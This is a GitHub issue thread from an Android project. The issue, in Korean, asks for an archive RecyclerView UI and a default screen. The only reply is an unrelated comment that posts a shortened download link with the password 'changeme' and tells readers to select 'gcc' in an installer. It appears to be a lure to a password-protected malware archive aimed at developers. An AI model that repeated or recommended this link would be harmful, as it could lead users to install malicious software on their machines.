### ISSUE TITLE
feat: 보관함 리사이클러뷰 ui 구현

### ISSUE THREAD

**Issue by yeonjeen** [Team-WSS/WSS-Android#242]
## 📜 Overview (Required)    
보관함 리사이클러뷰  ui 구현 및 디폴트 화면

## 📌 Child Issue(Optional)  

No response  

## 📍 Note (Optional) 
No response

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."
